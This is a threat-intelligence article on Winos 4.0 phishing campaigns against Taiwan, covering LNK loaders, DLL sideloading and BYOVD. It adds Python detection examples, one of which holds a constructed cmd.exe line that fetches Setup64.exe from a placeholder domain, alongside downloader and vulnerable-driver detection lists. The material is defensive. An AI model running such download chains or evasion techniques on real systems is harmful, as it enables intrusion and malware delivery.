Recent threat intelligence reveals multiple coordinated phishing campaigns targeting organizations in Taiwan using the Winos 4.0 malware framework. The operations rely heavily on localized social engineering themes, including tax notifications, electronic invoicing, and software installation packages to entice victims into executing malicious files.
The campaigns exhibit advanced operational discipline, incorporating multi-stage loaders, DLL sideloading, infrastructure rotation, and Bring Your Own Vulnerable Driver (BYOVD) techniques for stealth, persistence, and defensive evasion.
Threat Actor Context and Attribution
While no formal public attribution has been confirmed, infrastructure patterns, tooling overlaps, and operational similarities align with activity previously linked to the Silver Fox cluster, formally known as Silver Fox APT.
Observed characteristics consistent with advanced persistent threat (APT) operations include:
- Rotating domain registrations
- Shared TLS certificate infrastructure
- Multi-layer payload staging
- Long-term regional targeting strategy
The infrastructure agility and layered execution chains suggest a well-resourced and continuously operating threat group.
Winos 4.0 Malware Architecture
Winos 4.0 is a modular remote access framework derived from Gh0st RAT. It retains core RAT functionality while extending modular capabilities for post-exploitation control.
Core Capabilities
- Remote command execution
- Process injection
- Keylogging
- Screen capture
- File manipulation
- Plugin-based extensibility
The framework supports dynamic module loading, enabling operators to tailor capabilities per victim while minimizing forensic artifacts.
In the observed campaigns, Winos 4.0 demonstrates:
- Controlled C2 session management
- Kernel-level evasion via vulnerable driver loading
- In-memory plugin deployment
- Staged execution via loader chains
Campaign Delivery Mechanisms
FortiGuard’s research identified multiple infection pathways used across separate but related campaigns.
1. Tax-Themed Phishing with Malicious LNK Files
Attackers distribute RAR archives containing:
- A decoy document
- A malicious Windows shortcut (LNK file)
The LNK file invokes cmd.exe with obfuscated parameters, executing a scripted sequence that:
- Creates directories
- Copies and renames system utilities
- Downloads a next-stage payload (Setup64.exe) from an attacker-controlled domain
This approach disguises malicious behavior as legitimate command-line activity, helping bypass static detection mechanisms.
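The chain above (directory creation, a copied system utility, a download, caret or variable-expansion obfuscation) is what a process-creation rule should look for. The following is an added detection example, not code from the original report or from FortiGuard; the Sysmon-style field names, the list of download-capable utilities and the sample command lines are assumptions.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent_image: str   # e.g. Sysmon Event ID 1 ParentImage
    image: str          # Image
    command_line: str   # CommandLine

# Built-in utilities commonly used for the "download next stage" step; assumed list
DOWNLOADERS = ("curl.exe", "certutil", "bitsadmin", "powershell")

def lnk_chain_indicators(ev: ProcEvent) -> list[str]:
    """Return the indicators of the LNK -> cmd.exe chain matched by one event."""
    if not ev.image.lower().endswith("\\cmd.exe"):
        return []
    raw = ev.command_line.lower()
    cl = raw.replace("^", "")  # cmd.exe drops escape carets before parsing
    hits = []
    if ev.parent_image.lower().endswith("\\explorer.exe"):
        hits.append("cmd.exe launched from explorer.exe (double-clicked shortcut)")
    if re.search(r"\b(mkdir|md)\b", cl):
        hits.append("creates a directory")
    if re.search(r"\bcopy\b[^&|]*\\system32\\[^&|]*\.exe\b", cl):
        hits.append("copies a System32 utility elsewhere")
    if any(tool in cl for tool in DOWNLOADERS) and "http" in cl:
        hits.append("downloads a payload with a built-in utility")
    if raw.count("^") >= 3 or len(re.findall(r"%[^%\s]+%", raw)) >= 2:
        hits.append("obfuscated parameters (carets / variable expansion)")
    return hits

def is_suspicious(ev: ProcEvent, threshold: int = 3) -> bool:
    """Alert when enough independent stages of the chain appear in one command line."""
    return len(lnk_chain_indicators(ev)) >= threshold

# Constructed sample events; the domain and file names are placeholders
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c m^kdir %PUBLIC%\Tax & copy C:\Windows\System32\curl.exe %PUBLIC%\Tax\svc.exe"
              r" & %PUBLIC%\Tax\svc.exe -o %PUBLIC%\Tax\Setup64.exe http://tax-notice.example.invalid/Setup64.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c dir C:\Users"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(is_suspicious(ev), lnk_chain_indicators(ev))
```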
2. DLL Sideloading via Forged Government Documents
Another infection vector uses compressed archives that include:
- A legitimate executable
- A malicious DLL
The attack exploits Windows DLL search order behavior. When executed, the legitimate application loads the attacker-supplied DLL placed in the same directory. This sideloading technique allows execution of malicious code without directly triggering standard security alerts.
This tactic increases stealth by leveraging trusted binaries.
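A simple hunt for the archive layout described here is to look for directories, especially user-writable ones, where an executable sits beside a DLL whose name shadows a system library. This is an added example, not code from the original report or from FortiGuard; the list of commonly shadowed DLL names, the user-writable path components and the sample directory tree are assumptions.

```python
import os
import tempfile
from pathlib import Path

# DLL names that applications commonly resolve through the search order; a copy of one
# beside an EXE in a user-writable folder is a sideloading candidate. Assumed short list.
COMMONLY_HIJACKED = {"version.dll", "dwmapi.dll", "cryptbase.dll", "uxtheme.dll",
                     "wtsapi32.dll", "profapi.dll", "propsys.dll"}
USER_WRITABLE_PARTS = {"users", "programdata", "temp", "tmp", "downloads", "appdata"}

def find_sideload_candidates(root: Path) -> list[tuple[str, str, str]]:
    """Walk root and report (exe, dll, reason) for each EXE that sits beside a suspicious DLL."""
    findings = []
    for dirpath, _, files in os.walk(root):
        names = {f.lower(): f for f in files}
        exes = [n for n in names if n.endswith(".exe")]
        dlls = [n for n in names if n.endswith(".dll")]
        if not exes or not dlls:
            continue
        parts = {p.lower() for p in Path(dirpath).relative_to(root).parts}
        writable = bool(parts & USER_WRITABLE_PARTS)
        for dll in dlls:
            reasons = []
            if dll in COMMONLY_HIJACKED:
                reasons.append("shadows a system DLL name")
            if writable:
                reasons.append("in a user-writable location")
            if reasons:
                for exe in exes:
                    findings.append((names[exe], names[dll], "; ".join(reasons)))
    return findings

def build_sample_tree() -> Path:
    """Constructed directory layout mimicking the archive described above (not real samples)."""
    root = Path(tempfile.mkdtemp())
    lure = root / "Users" / "Public" / "TaxNotice"
    lure.mkdir(parents=True)
    (lure / "Viewer.exe").write_bytes(b"MZ")      # stands in for the legitimate EXE
    (lure / "version.dll").write_bytes(b"MZ")     # stands in for the attacker-supplied DLL
    vendor = root / "Program Files" / "Vendor"
    vendor.mkdir(parents=True)
    (vendor / "app.exe").write_bytes(b"MZ")       # legitimate install, should not be flagged
    (vendor / "vendorlib.dll").write_bytes(b"MZ")
    return root

if __name__ == "__main__":
    for exe, dll, why in find_sideload_candidates(build_sample_tree()):
        print(f"{exe} + {dll}: {why}")
```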
3. BYOVD for Kernel-Level Defense Evasion
After establishing initial access, the malware attempts to elevate privileges and suppress security controls using a signed but vulnerable kernel driver (wsftprm.sys).
Through BYOVD, attackers:
- Terminate security processes
- Hide malicious activity
- Enable execution of memory-resident payloads
- Bypass driver signature enforcement controls
Using a legitimately signed driver significantly reduces detection likelihood compared to deploying unsigned kernel components.
Payload Execution Flow
Once sideloading or LNK-based execution succeeds, the malware performs the following sequence:
- Validates the Windows OS version
- Establishes a connection to a hard-coded C2 server
- Loads an “online module”
- Retrieves additional plugins directly into memory
Identified Modules
- 登录模块 (Authentication / Login Module)
- 文件管理 (File Management)
- 系统管理 (System Management)
- 屏幕监视 (Screen Monitoring / Capture)
These components collectively provide comprehensive remote administration and data exfiltration functionality.
Command-and-Control Infrastructure
Key infrastructure traits include:
- Rapidly rotated malicious domains mimicking official institutions
- Cloud-based file hosting services for payload staging
- Base64-encoded C2 endpoints embedded within binaries
- Frequently updated hosting nodes to evade static blocklists
This dynamic infrastructure model complicates traditional IOC-based detection strategies and emphasizes the need for behavioral analytics.
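Because the C2 endpoints are base64-encoded inside the binaries, a static triage pass can recover them by decoding every base64-looking run and keeping only those that decode to a host or URL. This is an added example, not code from the original report or from FortiGuard; it assumes plain base64 of an ASCII endpoint, and the sample blob and the placeholder domain are constructed.

```python
import base64
import re

# Base64 runs of at least 16 characters; runs in binaries are usually NUL-terminated
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")
# What a decoded C2 endpoint is expected to look like: host[:port][/path] with optional scheme
ENDPOINT = re.compile(
    r"^(?:https?://)?(?:[a-z0-9-]+\.)+[a-z]{2,}(?::\d{1,5})?(?:/[\w./?=&%-]*)?$", re.I)

def extract_b64_endpoints(blob: bytes) -> list[tuple[int, str]]:
    """Return (offset, decoded_endpoint) for every base64 run that decodes to a host/URL."""
    found = []
    for m in B64_RUN.finditer(blob):
        run = m.group()
        # The run may have swallowed trailing alphanumerics; try trimming up to 3 chars
        for trim in range(4):
            cand = run[: len(run) - trim] if trim else run
            if len(cand) % 4:
                continue
            try:
                text = base64.b64decode(cand, validate=True).decode("ascii")
            except (ValueError, UnicodeDecodeError):
                continue
            if ENDPOINT.match(text):
                found.append((m.start(), text))
                break
    return found

# Constructed stand-in for a binary: header bytes, a plain string, one encoded endpoint
# (placeholder domain) and some base64-looking noise that must not produce a hit.
ENCODED_C2 = base64.b64encode(b"http://update.tax-invoice.example.invalid:8080/online")
SAMPLE_BLOB = (b"MZ\x90\x00" + b"\x00" * 8
               + b"ThisIsAReadableStringWithoutPadding12" + b"\x00"
               + ENCODED_C2 + b"\x00"
               + b"AAAAAAAAAAAAAAAAAAAAAAAA" + b"\x00"
               + base64.b64encode(bytes(range(1, 14))) + b"\x00")

if __name__ == "__main__":
    for off, ep in extract_b64_endpoints(SAMPLE_BLOB):
        print(f"offset {off:#x}: {ep}")
```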
Defensive Recommendations
To mitigate similar threats, organizations should implement layered security controls:
- Advanced email filtering with sandboxing
- Endpoint Detection and Response (EDR) solutions
- Phishing awareness training and simulations
- Zero Trust network segmentation
- Monitoring for vulnerable or unauthorized driver loading
- Threat hunting for suspicious DLL sideloading activity
Security teams should also audit systems for anomalous driver installations and investigate unsigned or suspiciously loaded modules.
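The BYOVD section above and these recommendations come down to one rule: a valid signature must never clear a driver that is on a vulnerable-driver list or that loads from an unexpected location. The following is an added example of that triage logic, not code from the original report or from FortiGuard; the Sysmon-style field names and the sample events are assumptions, the hash blocklist is an empty placeholder, and wsftprm.sys is the only name taken from the page.

```python
from dataclasses import dataclass

@dataclass
class DriverLoad:
    image_loaded: str   # e.g. Sysmon Event ID 6 ImageLoaded
    signed: bool        # Signed
    signer: str         # Signature (publisher)
    sha256: str         # Hashes

# wsftprm.sys is the driver named in the campaign description above. The hash set is a
# placeholder to be filled from a maintained vulnerable-driver list; it is empty here.
BLOCKED_NAMES = {"wsftprm.sys"}
BLOCKED_SHA256: set[str] = set()
TRUSTED_DIRS = ("c:\\windows\\system32\\drivers\\", "c:\\windows\\system32\\driverstore\\")

def assess_driver_load(ev: DriverLoad) -> tuple[str, list[str]]:
    """Return (severity, reasons). A valid signature never downgrades a blocklist hit,
    which is exactly the BYOVD case: signed, yet known-vulnerable."""
    path = ev.image_loaded.lower()
    name = path.rsplit("\\", 1)[-1]
    reasons = []
    if name in BLOCKED_NAMES:
        reasons.append("known-vulnerable driver name")
    if ev.sha256.lower() in BLOCKED_SHA256:
        reasons.append("hash on vulnerable-driver blocklist")
    high = bool(reasons)
    if not path.startswith(TRUSTED_DIRS):
        reasons.append("loaded from outside the system driver directories")
    if not ev.signed:
        reasons.append("unsigned kernel module")
    severity = "high" if high else ("medium" if reasons else "none")
    return severity, reasons

# Constructed events; the hash values and signer names are placeholders, not real indicators
SAMPLE_LOADS = [
    DriverLoad(r"C:\ProgramData\Updater\wsftprm.sys", True, "Example Vendor (placeholder)", "00" * 32),
    DriverLoad(r"C:\Users\Public\Temp\xyz.sys", False, "", "11" * 32),
    DriverLoad(r"C:\Windows\System32\drivers\disk.sys", True, "Microsoft Windows", "22" * 32),
]

if __name__ == "__main__":
    for ev in SAMPLE_LOADS:
        print(ev.image_loaded, *assess_driver_load(ev))
```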
Conclusion
The Winos 4.0 campaigns targeting Taiwan represent a structured, multi-vector attack operation employing social engineering, modular malware, and kernel-level evasion techniques. The integration of DLL sideloading, BYOVD exploitation, and in-memory module loading reflects a mature threat actor capable of sustaining long-term regional targeting efforts.
Organizations must adopt behavioral detection, driver integrity monitoring, and proactive threat intelligence integration to counter increasingly sophisticated modular malware frameworks like Winos 4.0.
